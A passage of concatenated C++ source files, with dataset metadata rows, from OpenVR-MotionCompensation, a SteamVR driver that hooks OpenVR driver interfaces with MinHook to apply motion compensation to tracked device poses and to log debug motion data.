_n12) * (point.v[0] - centerOfRotation.v[0]) + (1.0 - (_n4 + _n6)) * (point.v[1] - centerOfRotation.v[1]) + (_n9 - _n10) * (point.v[2] - centerOfRotation.v[2]) + centerOfRotation.v[1] + translation.v[1], (_n8 - _n11) * (point.v[0] - centerOfRotation.v[0]) + (_n9 + _n10) * (point.v[1] - centerOfRotation.v[1]) + (1.0 - (_n4 + _n5)) * (point.v[2] - centerOfRotation.v[2]) + centerOfRotation.v[2] + translation.v[2] }; } } }
20,168
C++
.cpp
435
42.073563
214
0.675696
openvrmc/OpenVR-MotionCompensation
36
16
4
GPL-3.0
9/20/2024, 10:43:45 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,194
Debugger.cpp
openvrmc_OpenVR-MotionCompensation/driver_vrmotioncompensation/src/devicemanipulation/Debugger.cpp
#include "Debugger.h" #include "../logging.h" #include <iostream> #include <fstream> namespace vrmotioncompensation { namespace driver { Debugger::Debugger() { } Debugger::~Debugger() { } void Debugger::Start() { std::lock_guard<std::recursive_mutex> lockGuard(_mut); DebugCounter = 0; WroteToFile = false; DebuggerRunning = true; DebugTimer.start(); LOG(DEBUG) << "Logger started"; } void Debugger::Stop() { std::lock_guard<std::recursive_mutex> lockGuard(_mut); DebuggerRunning = false; LOG(DEBUG) << "Logger stopped"; } bool Debugger::IsRunning() { return DebuggerRunning; } void Debugger::CountUp() { std::lock_guard<std::recursive_mutex> lockGuard(_mut); if (DebuggerRunning) { DebugTiming[DebugCounter] = DebugTimer.seconds(); if (DebugCounter >= MAX_DEBUG_ENTRIES - 1) { DebuggerRunning = false; } else { DebugCounter++; Ref = Hmd = false; } } } void Debugger::AddDebugData(vr::HmdVector3d_t Data, int ID) { std::lock_guard<std::recursive_mutex> lockGuard(_mut); if (DebuggerRunning) { DebugDataV3[ID].Data[DebugCounter] = Data; } } void Debugger::AddDebugData(vr::HmdQuaternion_t Data, int ID) { std::lock_guard<std::recursive_mutex> lockGuard(_mut); if (DebuggerRunning) { DebugDataQ4[ID].Data[DebugCounter] = Data; } } void Debugger::AddDebugData(const double Data[3], int ID) { std::lock_guard<std::recursive_mutex> lockGuard(_mut); if (DebuggerRunning) { DebugDataV3[ID].Data[DebugCounter].v[0] = Data[0]; DebugDataV3[ID].Data[DebugCounter].v[1] = Data[1]; DebugDataV3[ID].Data[DebugCounter].v[2] = Data[2]; } } void Debugger::gotRef() { Ref = true; } void Debugger::gotHmd() { Hmd = true; } bool Debugger::hasRef() { return Ref; } bool Debugger::hasHmd() { return Hmd; } void Debugger::SetDebugNameQ4(std::string Name, int ID) { std::lock_guard<std::recursive_mutex> lockGuard(_mut); DebugDataQ4[ID].Name = Name; DebugDataQ4[ID].InUse = true; } void Debugger::SetDebugNameV3(std::string Name, int ID) { std::lock_guard<std::recursive_mutex> lockGuard(_mut); DebugDataV3[ID].Name = Name; DebugDataV3[ID].InUse = true; } void Debugger::WriteFile() { std::lock_guard<std::recursive_mutex> lockGuard(_mut); if (!WroteToFile && DebugCounter > 0) { LOG(DEBUG) << "Trying to write debug file..."; std::ofstream DebugFile; DebugFile.open("MotionData.txt"); if (!DebugFile.bad()) { unsigned int index = 1; LOG(DEBUG) << "Writing " << DebugCounter << " debug points of data"; //Write title DebugFile << "Time;"; //Quaternions for (int i = 0; i < MAX_DEBUG_QUATERNIONS; i++) { if (DebugDataQ4[i].InUse) { DebugFile << DebugDataQ4[i].Name << "[" << index << ":4];"; index += 4; } } //Vectors for (int i = 0; i < MAX_DEBUG_VECTORS; i++) { if (DebugDataV3[i].InUse) { DebugFile << DebugDataV3[i].Name << "[" << index << ":3];"; index += 3; } } DebugFile << std::endl; //Write data for (int i = 0; i < DebugCounter; i++) { DebugFile << DebugTiming[i] << ";"; for (int j = 0; j < MAX_DEBUG_QUATERNIONS; j++) { if (DebugDataQ4[j].InUse) { DebugFile << DebugDataQ4[j].Data[i].w << ";"; DebugFile << DebugDataQ4[j].Data[i].x << ";"; DebugFile << DebugDataQ4[j].Data[i].y << ";"; DebugFile << DebugDataQ4[j].Data[i].z << ";"; } } for (int j = 0; j < MAX_DEBUG_VECTORS; j++) { if (DebugDataV3[j].InUse) { DebugFile << DebugDataV3[j].Data[i].v[0] << ";"; DebugFile << DebugDataV3[j].Data[i].v[1] << ";"; DebugFile << DebugDataV3[j].Data[i].v[2] << ";"; } } DebugFile << std::endl; } DebugFile.close(); WroteToFile = true; } else { LOG(ERROR) << "Could not write debug log"; } } } } }
4,159
C++
.cpp
173
19.086705
73
0.59375
openvrmc/OpenVR-MotionCompensation
36
16
4
GPL-3.0
9/20/2024, 10:43:45 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,195
DeviceManipulationHandle.cpp
openvrmc_OpenVR-MotionCompensation/driver_vrmotioncompensation/src/devicemanipulation/DeviceManipulationHandle.cpp
#include "DeviceManipulationHandle.h" #include "../driver/ServerDriver.h" #include "../hooks/IVRServerDriverHost004Hooks.h" #include "../hooks/IVRServerDriverHost005Hooks.h" #undef WIN32_LEAN_AND_MEAN #undef NOSOUND #include <Windows.h> // According to windows documentation mmsystem.h should be automatically included with Windows.h when WIN32_LEAN_AND_MEAN and NOSOUND are not defined // But it doesn't work so I have to include it manually #include <mmsystem.h> namespace vrmotioncompensation { namespace driver { DeviceManipulationHandle::DeviceManipulationHandle(const char* serial, vr::ETrackedDeviceClass eDeviceClass) : m_isValid(true), m_parent(ServerDriver::getInstance()), m_motionCompensationManager(m_parent->motionCompensation()), m_eDeviceClass(eDeviceClass), m_serialNumber(serial) { } void DeviceManipulationHandle::setValid(bool isValid) { m_isValid = isValid; } bool DeviceManipulationHandle::handlePoseUpdate(uint32_t& unWhichDevice, vr::DriverPose_t& newPose, uint32_t unPoseStructSize) { if (m_deviceMode == MotionCompensationDeviceMode::ReferenceTracker) { //Check if the pose is valid to prevent unwanted jitter and movement if (newPose.poseIsValid && newPose.result == vr::TrackingResult_Running_OK) { //Set the Zero-Point for the reference tracker if not done yet if (!m_motionCompensationManager.isZeroPoseValid()) { m_motionCompensationManager.setZeroPose(newPose); } else { //Update reference tracker position m_motionCompensationManager.updateRefPose(newPose); } } } else if (m_deviceMode == MotionCompensationDeviceMode::MotionCompensated) { //Check if the pose is valid to prevent unwanted jitter and movement if (newPose.poseIsValid && newPose.result == vr::TrackingResult_Running_OK) { m_motionCompensationManager.applyMotionCompensation(newPose); } } return true; } void DeviceManipulationHandle::setMotionCompensationDeviceMode(MotionCompensationDeviceMode DeviceMode) { m_deviceMode = DeviceMode; } } // end namespace driver } // end namespace vrmotioncompensation
2,164
C++
.cpp
57
34.122807
174
0.766079
openvrmc/OpenVR-MotionCompensation
36
16
4
GPL-3.0
9/20/2024, 10:43:45 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,196
WatchdogProvider.cpp
openvrmc_OpenVR-MotionCompensation/driver_vrmotioncompensation/src/driver/WatchdogProvider.cpp
#include "WatchdogProvider.h" #include "../logging.h" // driver namespace namespace vrmotioncompensation { namespace driver { vr::EVRInitError WatchdogProvider::Init(vr::IVRDriverContext* pDriverContext) { LOG(TRACE) << "WatchdogProvider::Init()"; VR_INIT_WATCHDOG_DRIVER_CONTEXT(pDriverContext); return vr::VRInitError_None; } void WatchdogProvider::Cleanup() { LOG(TRACE) << "WatchdogProvider::Cleanup()"; VR_CLEANUP_WATCHDOG_DRIVER_CONTEXT(); } } }
485
C++
.cpp
20
21.6
79
0.744589
openvrmc/OpenVR-MotionCompensation
36
16
4
GPL-3.0
9/20/2024, 10:43:45 PM (Europe/Amsterdam)
false
false
false
false
false
true
false
false
1,532,197
ServerDriver.cpp
openvrmc_OpenVR-MotionCompensation/driver_vrmotioncompensation/src/driver/ServerDriver.cpp
#include "ServerDriver.h" #include "../devicemanipulation/DeviceManipulationHandle.h" namespace vrmotioncompensation { namespace driver { ServerDriver* ServerDriver::singleton = nullptr; std::string ServerDriver::installDir; ServerDriver::ServerDriver() : m_motionCompensation(this) { singleton = this; memset(_openvrIdDeviceManipulationHandle, 0, sizeof(DeviceManipulationHandle*) * vr::k_unMaxTrackedDeviceCount); memset(_deviceVersionMap, 0, sizeof(int) * vr::k_unMaxTrackedDeviceCount); } ServerDriver::~ServerDriver() { LOG(TRACE) << "driver::~ServerDriver()"; } bool ServerDriver::hooksTrackedDevicePoseUpdated(void* serverDriverHost, int version, uint32_t& unWhichDevice, vr::DriverPose_t& newPose, uint32_t& unPoseStructSize) { if (_openvrIdDeviceManipulationHandle[unWhichDevice] && _openvrIdDeviceManipulationHandle[unWhichDevice]->isValid()) { if (_deviceVersionMap[unWhichDevice] == 0) { _deviceVersionMap[unWhichDevice] = version; } //LOG(TRACE) << "ServerDriver::hooksTrackedDevicePoseUpdated(version:" << version << ", deviceId:" << unWhichDevice << ", first used version: " << _deviceVersionMap[unWhichDevice] << ")"; if (_deviceVersionMap[unWhichDevice] == version) { return _openvrIdDeviceManipulationHandle[unWhichDevice]->handlePoseUpdate(unWhichDevice, newPose, unPoseStructSize); } //LOG(TRACE) << "ServerDriver::hooksTrackedDevicePoseUpdated called for wrong version, ignoring "; } return true; } void ServerDriver::hooksTrackedDeviceAdded(void* serverDriverHost, int version, const char* pchDeviceSerialNumber, vr::ETrackedDeviceClass& eDeviceClass, void* pDriver) { LOG(TRACE) << "ServerDriver::hooksTrackedDeviceAdded(" << serverDriverHost << ", " << version << ", " << pchDeviceSerialNumber << ", " << (int)eDeviceClass << ", " << pDriver << ")"; LOG(INFO) << "Found device " << pchDeviceSerialNumber << " (deviceClass: " << (int)eDeviceClass << ")"; // Create ManipulationInfo entry auto handle = std::make_shared<DeviceManipulationHandle>(pchDeviceSerialNumber, eDeviceClass); _deviceManipulationHandles.insert({ pDriver, handle }); // Hook into server driver interface handle->setServerDriverHooks(InterfaceHooks::hookInterface(pDriver, "ITrackedDeviceServerDriver_005")); } void ServerDriver::hooksTrackedDeviceActivated(void* serverDriver, int version, uint32_t unObjectId) { LOG(TRACE) << "ServerDriver::hooksTrackedDeviceActivated(" << serverDriver << ", " << version << ", " << unObjectId << ")"; // Search for the activated device auto i = _deviceManipulationHandles.find(serverDriver); if (i != _deviceManipulationHandles.end()) { auto handle = i->second; handle->setOpenvrId(unObjectId); _openvrIdDeviceManipulationHandle[unObjectId] = handle.get(); //LOG(INFO) << "Successfully added device " << handle->serialNumber() << " (OpenVR Id: " << handle->openvrId() << ")"; LOG(INFO) << "Successfully added device " << _openvrIdDeviceManipulationHandle[unObjectId]->serialNumber() << " (OpenVR Id: " << _openvrIdDeviceManipulationHandle[unObjectId]->openvrId() << ")"; } } vr::EVRInitError ServerDriver::Init(vr::IVRDriverContext* pDriverContext) { LOG(INFO) << "CServerDriver::Init()"; // Initialize Hooking InterfaceHooks::setServerDriver(this); auto mhError = MH_Initialize(); if (mhError == MH_OK) { _driverContextHooks = InterfaceHooks::hookInterface(pDriverContext, "IVRDriverContext"); } else { LOG(ERROR) << "Error while initializing minHook: " << MH_StatusToString(mhError); } LOG(DEBUG) << "Initialize driver context."; VR_INIT_SERVER_DRIVER_CONTEXT(pDriverContext); // Read installation directory vr::ETrackedPropertyError tpeError; installDir = vr::VRProperties()->GetStringProperty(pDriverContext->GetDriverHandle(), vr::Prop_InstallPath_String, &tpeError); if (tpeError == vr::TrackedProp_Success) { LOG(INFO) << "Install Dir:" << installDir; } else { LOG(INFO) << "Could not get Install Dir: " << vr::VRPropertiesRaw()->GetPropErrorNameFromEnum(tpeError); } // Start IPC thread shmCommunicator.init(this); return vr::VRInitError_None; } void ServerDriver::Cleanup() { LOG(TRACE) << "ServerDriver::Cleanup()"; _driverContextHooks.reset(); MH_Uninitialize(); shmCommunicator.shutdown(); VR_CLEANUP_SERVER_DRIVER_CONTEXT(); } // Call frequency: ~93Hz void ServerDriver::RunFrame() { } DeviceManipulationHandle* ServerDriver::getDeviceManipulationHandleById(uint32_t unWhichDevice) { LOG(TRACE) << "getDeviceByID: unWhichDevice: " << unWhichDevice; std::lock_guard<std::recursive_mutex> lock(_deviceManipulationHandlesMutex); if (_openvrIdDeviceManipulationHandle[unWhichDevice]->isValid()) { if (_openvrIdDeviceManipulationHandle[unWhichDevice]) { return _openvrIdDeviceManipulationHandle[unWhichDevice]; } else { LOG(ERROR) << "_openvrIdDeviceManipulationHandle[unWhichDevice] is NULL. unWhichDevice: " << unWhichDevice; } } else { LOG(ERROR) << "_openvrIdDeviceManipulationHandle[unWhichDevice] is not valid. unWhichDevice: " << unWhichDevice; } return nullptr; } } // end namespace driver } // end namespace vrmotioncompensation
5,363
C++
.cpp
125
38.816
198
0.725614
openvrmc/OpenVR-MotionCompensation
36
16
4
GPL-3.0
9/20/2024, 10:43:45 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,198
IVRServerDriverHost006Hooks.cpp
openvrmc_OpenVR-MotionCompensation/driver_vrmotioncompensation/src/hooks/IVRServerDriverHost006Hooks.cpp
#include "IVRServerDriverHost006Hooks.h" #include "../driver/ServerDriver.h" namespace vrmotioncompensation { namespace driver { HookData<IVRServerDriverHost006Hooks::trackedDeviceAdded_t> IVRServerDriverHost006Hooks::trackedDeviceAddedHook; HookData<IVRServerDriverHost006Hooks::trackedDevicePoseUpdated_t> IVRServerDriverHost006Hooks::trackedDevicePoseUpdatedHook; IVRServerDriverHost006Hooks::IVRServerDriverHost006Hooks(void* iptr) { if (!_isHooked) { CREATE_MH_HOOK(trackedDeviceAddedHook, _trackedDeviceAdded, "IVRServerDriverHost006::TrackedDeviceAdded", iptr, 0); CREATE_MH_HOOK(trackedDevicePoseUpdatedHook, _trackedDevicePoseUpdated, "IVRServerDriverHost006::TrackedDevicePoseUpdated", iptr, 1); _isHooked = true; } } IVRServerDriverHost006Hooks::~IVRServerDriverHost006Hooks() { if (_isHooked) { REMOVE_MH_HOOK(trackedDeviceAddedHook); REMOVE_MH_HOOK(trackedDevicePoseUpdatedHook); _isHooked = false; } } std::shared_ptr<InterfaceHooks> IVRServerDriverHost006Hooks::createHooks(void* iptr) { std::shared_ptr<InterfaceHooks> retval = std::shared_ptr<InterfaceHooks>(new IVRServerDriverHost006Hooks(iptr)); return retval; } void IVRServerDriverHost006Hooks::trackedDevicePoseUpdatedOrig(void* _this, uint32_t unWhichDevice, const vr::DriverPose_t& newPose, uint32_t unPoseStructSize) { trackedDevicePoseUpdatedHook.origFunc(_this, unWhichDevice, newPose, unPoseStructSize); } bool IVRServerDriverHost006Hooks::_trackedDeviceAdded(void* _this, const char* pchDeviceSerialNumber, vr::ETrackedDeviceClass eDeviceClass, void* pDriver) { LOG(TRACE) << "IVRServerDriverHost006Hooks::_trackedDeviceAdded(" << _this << ", " << pchDeviceSerialNumber << ", " << eDeviceClass << ", " << pDriver << ")"; serverDriver->hooksTrackedDeviceAdded(_this, 6, pchDeviceSerialNumber, eDeviceClass, pDriver); auto retval = trackedDeviceAddedHook.origFunc(_this, pchDeviceSerialNumber, eDeviceClass, pDriver); return retval; } void IVRServerDriverHost006Hooks::_trackedDevicePoseUpdated(void* _this, uint32_t unWhichDevice, const vr::DriverPose_t& newPose, uint32_t unPoseStructSize) { // Call rates: // // Vive HMD: 1120 calls/s // Vive Controller: 369 calls/s each // // Time is key. If we assume 1 HMD and 13 controllers, we have a total of ~6000 calls/s. That's about 166 microseconds per call at 100% load. auto poseCopy = newPose; if (serverDriver->hooksTrackedDevicePoseUpdated(_this, 6, unWhichDevice, poseCopy, unPoseStructSize)) { trackedDevicePoseUpdatedHook.origFunc(_this, unWhichDevice, poseCopy, unPoseStructSize); } } } }
2,683
C++
.cpp
58
42.534483
161
0.778673
openvrmc/OpenVR-MotionCompensation
36
16
4
GPL-3.0
9/20/2024, 10:43:45 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,199
IVRServerDriverHost004Hooks.cpp
openvrmc_OpenVR-MotionCompensation/driver_vrmotioncompensation/src/hooks/IVRServerDriverHost004Hooks.cpp
#include "IVRServerDriverHost004Hooks.h" #include "../driver/ServerDriver.h" namespace vrmotioncompensation { namespace driver { HookData<IVRServerDriverHost004Hooks::trackedDeviceAdded_t> IVRServerDriverHost004Hooks::trackedDeviceAddedHook; HookData<IVRServerDriverHost004Hooks::trackedDevicePoseUpdated_t> IVRServerDriverHost004Hooks::trackedDevicePoseUpdatedHook; IVRServerDriverHost004Hooks::IVRServerDriverHost004Hooks(void* iptr) { if (!_isHooked) { CREATE_MH_HOOK(trackedDeviceAddedHook, _trackedDeviceAdded, "IVRServerDriverHost004::TrackedDeviceAdded", iptr, 0); CREATE_MH_HOOK(trackedDevicePoseUpdatedHook, _trackedDevicePoseUpdated, "IVRServerDriverHost004::TrackedDevicePoseUpdated", iptr, 1); _isHooked = true; } } IVRServerDriverHost004Hooks::~IVRServerDriverHost004Hooks() { if (_isHooked) { REMOVE_MH_HOOK(trackedDeviceAddedHook); REMOVE_MH_HOOK(trackedDevicePoseUpdatedHook); _isHooked = false; } } std::shared_ptr<InterfaceHooks> IVRServerDriverHost004Hooks::createHooks(void* iptr) { std::shared_ptr<InterfaceHooks> retval = std::shared_ptr<InterfaceHooks>(new IVRServerDriverHost004Hooks(iptr)); return retval; } void IVRServerDriverHost004Hooks::trackedDevicePoseUpdatedOrig(void* _this, uint32_t unWhichDevice, const vr::DriverPose_t& newPose, uint32_t unPoseStructSize) { trackedDevicePoseUpdatedHook.origFunc(_this, unWhichDevice, newPose, unPoseStructSize); } bool IVRServerDriverHost004Hooks::_trackedDeviceAdded(void* _this, const char* pchDeviceSerialNumber, vr::ETrackedDeviceClass eDeviceClass, void* pDriver) { char* sn = (char*)pchDeviceSerialNumber; if ((sn >= (char*)0 && sn < (char*)0xff) || eDeviceClass < 0 || eDeviceClass > vr::ETrackedDeviceClass::TrackedDeviceClass_DisplayRedirect) { // SteamVR Vive driver bug, it's calling this function with random garbage LOG(ERROR) << "Not running _trackedDeviceAdded because of SteamVR driver bug."; return false; } LOG(TRACE) << "IVRServerDriverHost004Hooks::_trackedDeviceAdded(" << _this << ", " << pchDeviceSerialNumber << ", " << eDeviceClass << ", " << pDriver << ")"; serverDriver->hooksTrackedDeviceAdded(_this, 4, pchDeviceSerialNumber, eDeviceClass, pDriver); auto retval = trackedDeviceAddedHook.origFunc(_this, pchDeviceSerialNumber, eDeviceClass, pDriver); return retval; } void IVRServerDriverHost004Hooks::_trackedDevicePoseUpdated(void* _this, uint32_t unWhichDevice, const vr::DriverPose_t& newPose, uint32_t unPoseStructSize) { // Call rates: // // Vive HMD: 1120 calls/s // Vive Controller: 369 calls/s each // // Time is key. If we assume 1 HMD and 13 controllers, we have a total of ~6000 calls/s. That's about 166 microseconds per call at 100% load. auto poseCopy = newPose; if (serverDriver->hooksTrackedDevicePoseUpdated(_this, 4, unWhichDevice, poseCopy, unPoseStructSize)) { trackedDevicePoseUpdatedHook.origFunc(_this, unWhichDevice, poseCopy, unPoseStructSize); } } } }
3,055
C++
.cpp
65
43.292308
161
0.768456
openvrmc/OpenVR-MotionCompensation
36
16
4
GPL-3.0
9/20/2024, 10:43:45 PM (Europe/Amsterdam)
false
false
false
false
false
true
false
false
1,532,200
IVRDriverContextHooks.cpp
openvrmc_OpenVR-MotionCompensation/driver_vrmotioncompensation/src/hooks/IVRDriverContextHooks.cpp
#include "IVRDriverContextHooks.h" namespace vrmotioncompensation { namespace driver { HookData<IVRDriverContextHooks::getGenericInterface_t> IVRDriverContextHooks::getGenericInterfaceHook; std::map<std::string, std::shared_ptr<InterfaceHooks>> IVRDriverContextHooks::_hookedInterfaces; IVRDriverContextHooks::IVRDriverContextHooks(void* iptr) { if (!_isHooked) { CREATE_MH_HOOK(getGenericInterfaceHook, _getGenericInterface, "IVRDriverContext::GetGenericInterface", iptr, 0); _isHooked = true; } } IVRDriverContextHooks::~IVRDriverContextHooks() { if (_isHooked) { REMOVE_MH_HOOK(getGenericInterfaceHook); _isHooked = false; } } std::shared_ptr<InterfaceHooks> IVRDriverContextHooks::createHooks(void* iptr) { std::shared_ptr<InterfaceHooks> retval = std::shared_ptr<InterfaceHooks>(new IVRDriverContextHooks(iptr)); return retval; } std::shared_ptr<InterfaceHooks> IVRDriverContextHooks::getInterfaceHook(std::string interfaceVersion) { auto it = _hookedInterfaces.find(interfaceVersion); if (it != _hookedInterfaces.end()) { return it->second; } return nullptr; } void* IVRDriverContextHooks::_getGenericInterface(vr::IVRDriverContext* _this, const char* pchInterfaceVersion, vr::EVRInitError* peError) { auto retval = getGenericInterfaceHook.origFunc(_this, pchInterfaceVersion, peError); if (_hookedInterfaces.find(pchInterfaceVersion) == _hookedInterfaces.end()) { auto hooks = InterfaceHooks::hookInterface(retval, pchInterfaceVersion); if (hooks != nullptr) { _hookedInterfaces.insert({ std::string(pchInterfaceVersion), hooks }); } } LOG(TRACE) << "IVRDriverContextHooks::_getGenericInterface(" << _this << ", " << pchInterfaceVersion << ") = " << retval; return retval; } } }
1,827
C++
.cpp
53
30.811321
140
0.746041
openvrmc/OpenVR-MotionCompensation
36
16
4
GPL-3.0
9/20/2024, 10:43:45 PM (Europe/Amsterdam)
false
false
false
false
false
true
false
false
1,532,201
common.cpp
openvrmc_OpenVR-MotionCompensation/driver_vrmotioncompensation/src/hooks/common.cpp
#include "common.h" #include "../logging.h" #include "IVRDriverContextHooks.h" #include "IVRServerDriverHost004Hooks.h" #include "IVRServerDriverHost005Hooks.h" #include "IVRServerDriverHost006Hooks.h" #include "ITrackedDeviceServerDriver005Hooks.h" namespace vrmotioncompensation { namespace driver { ServerDriver* InterfaceHooks::serverDriver = nullptr; std::shared_ptr<InterfaceHooks> InterfaceHooks::hookInterface(void* interfaceRef, std::string interfaceVersion) { std::shared_ptr<InterfaceHooks> retval; if (interfaceVersion.compare("IVRDriverContext") == 0) { retval = IVRDriverContextHooks::createHooks(interfaceRef); } else if (interfaceVersion.compare("IVRServerDriverHost_004") == 0) { retval = IVRServerDriverHost004Hooks::createHooks(interfaceRef); } else if (interfaceVersion.compare("IVRServerDriverHost_005") == 0) { retval = IVRServerDriverHost005Hooks::createHooks(interfaceRef); } else if (interfaceVersion.compare("IVRServerDriverHost_006") == 0) { retval = IVRServerDriverHost006Hooks::createHooks(interfaceRef); } else if (interfaceVersion.compare("ITrackedDeviceServerDriver_005") == 0) { retval = ITrackedDeviceServerDriver005Hooks::createHooks(interfaceRef); } return retval; } } }
1,292
C++
.cpp
39
29.948718
113
0.776
openvrmc/OpenVR-MotionCompensation
36
16
4
GPL-3.0
9/20/2024, 10:43:45 PM (Europe/Amsterdam)
false
false
false
false
false
true
false
false
1,532,202
ITrackedDeviceServerDriver005Hooks.cpp
openvrmc_OpenVR-MotionCompensation/driver_vrmotioncompensation/src/hooks/ITrackedDeviceServerDriver005Hooks.cpp
#include "ITrackedDeviceServerDriver005Hooks.h" #include "../driver/ServerDriver.h" namespace vrmotioncompensation { namespace driver { std::map<void*, ITrackedDeviceServerDriver005Hooks::_hookedAdressMapEntry<ITrackedDeviceServerDriver005Hooks::activate_t>> ITrackedDeviceServerDriver005Hooks::_hookedActivateAdressMap; ITrackedDeviceServerDriver005Hooks::ITrackedDeviceServerDriver005Hooks(void* iptr) { LOG(TRACE) << "ITrackedDeviceServerDriver005Hooks::ctr(" << iptr << ")"; auto vtable = (*((void***)iptr)); activateAddress = vtable[0]; auto it = _hookedActivateAdressMap.find(activateAddress); if (it == _hookedActivateAdressMap.end()) { CREATE_MH_HOOK(activateHook, _activate, "ITrackedDeviceServerDriver005::Activate", iptr, 0); _hookedActivateAdressMap[activateAddress].useCount = 1; _hookedActivateAdressMap[activateAddress].hookData = activateHook; } else { activateHook = it->second.hookData; it->second.useCount += 1; } } std::shared_ptr<InterfaceHooks> ITrackedDeviceServerDriver005Hooks::createHooks(void* iptr) { std::shared_ptr<InterfaceHooks> retval = std::shared_ptr<InterfaceHooks>(new ITrackedDeviceServerDriver005Hooks(iptr)); return retval; } ITrackedDeviceServerDriver005Hooks::~ITrackedDeviceServerDriver005Hooks() { auto it = _hookedActivateAdressMap.find(activateAddress); if (it != _hookedActivateAdressMap.end()) { if (it->second.useCount <= 1) { REMOVE_MH_HOOK(activateHook); _hookedActivateAdressMap.erase(it); } else { it->second.useCount -= 1; } } } vr::EVRInitError ITrackedDeviceServerDriver005Hooks::_activate(void* _this, uint32_t unObjectId) { LOG(TRACE) << "ITrackedDeviceServerDriver005Hooks::_activate(" << _this << ", " << unObjectId << ")"; auto vtable = (*((void***)_this)); auto activateAddress = vtable[0]; auto it = _hookedActivateAdressMap.find(activateAddress); if (it != _hookedActivateAdressMap.end()) { serverDriver->hooksTrackedDeviceActivated(_this, 5, unObjectId); return it->second.hookData.origFunc(_this, unObjectId); } else { LOG(ERROR) << "this pointer not in ITrackedDeviceServerDriver005Hooks::_hookedActivateAdressMap."; return vr::VRInitError_Unknown; } } } }
2,312
C++
.cpp
65
31.676923
186
0.737617
openvrmc/OpenVR-MotionCompensation
36
16
4
GPL-3.0
9/20/2024, 10:43:45 PM (Europe/Amsterdam)
false
false
false
false
false
true
false
false
1,532,203
IVRServerDriverHost005Hooks.cpp
openvrmc_OpenVR-MotionCompensation/driver_vrmotioncompensation/src/hooks/IVRServerDriverHost005Hooks.cpp
#include "IVRServerDriverHost005Hooks.h" #include "../driver/ServerDriver.h" namespace vrmotioncompensation { namespace driver { HookData<IVRServerDriverHost005Hooks::trackedDeviceAdded_t> IVRServerDriverHost005Hooks::trackedDeviceAddedHook; HookData<IVRServerDriverHost005Hooks::trackedDevicePoseUpdated_t> IVRServerDriverHost005Hooks::trackedDevicePoseUpdatedHook; IVRServerDriverHost005Hooks::IVRServerDriverHost005Hooks(void* iptr) { if (!_isHooked) { CREATE_MH_HOOK(trackedDeviceAddedHook, _trackedDeviceAdded, "IVRServerDriverHost005::TrackedDeviceAdded", iptr, 0); CREATE_MH_HOOK(trackedDevicePoseUpdatedHook, _trackedDevicePoseUpdated, "IVRServerDriverHost005::TrackedDevicePoseUpdated", iptr, 1); _isHooked = true; } } IVRServerDriverHost005Hooks::~IVRServerDriverHost005Hooks() { if (_isHooked) { REMOVE_MH_HOOK(trackedDeviceAddedHook); REMOVE_MH_HOOK(trackedDevicePoseUpdatedHook); _isHooked = false; } } std::shared_ptr<InterfaceHooks> IVRServerDriverHost005Hooks::createHooks(void* iptr) { std::shared_ptr<InterfaceHooks> retval = std::shared_ptr<InterfaceHooks>(new IVRServerDriverHost005Hooks(iptr)); return retval; } void IVRServerDriverHost005Hooks::trackedDevicePoseUpdatedOrig(void* _this, uint32_t unWhichDevice, const vr::DriverPose_t& newPose, uint32_t unPoseStructSize) { trackedDevicePoseUpdatedHook.origFunc(_this, unWhichDevice, newPose, unPoseStructSize); } bool IVRServerDriverHost005Hooks::_trackedDeviceAdded(void* _this, const char* pchDeviceSerialNumber, vr::ETrackedDeviceClass eDeviceClass, void* pDriver) { LOG(TRACE) << "IVRServerDriverHost005Hooks::_trackedDeviceAdded(" << _this << ", " << pchDeviceSerialNumber << ", " << eDeviceClass << ", " << pDriver << ")"; serverDriver->hooksTrackedDeviceAdded(_this, 5, pchDeviceSerialNumber, eDeviceClass, pDriver); auto retval = trackedDeviceAddedHook.origFunc(_this, pchDeviceSerialNumber, eDeviceClass, pDriver); return retval; } void IVRServerDriverHost005Hooks::_trackedDevicePoseUpdated(void* _this, uint32_t unWhichDevice, const vr::DriverPose_t& newPose, uint32_t unPoseStructSize) { // Call rates: // // Vive HMD: 1120 calls/s // Vive Controller: 369 calls/s each // // Time is key. If we assume 1 HMD and 13 controllers, we have a total of ~6000 calls/s. That's about 166 microseconds per call at 100% load. auto poseCopy = newPose; if (serverDriver->hooksTrackedDevicePoseUpdated(_this, 5, unWhichDevice, poseCopy, unPoseStructSize)) { trackedDevicePoseUpdatedHook.origFunc(_this, unWhichDevice, poseCopy, unPoseStructSize); } } } }
2,683
C++
.cpp
58
42.534483
161
0.778673
openvrmc/OpenVR-MotionCompensation
36
16
4
GPL-3.0
9/20/2024, 10:43:45 PM (Europe/Amsterdam)
false
false
false
false
false
true
false
false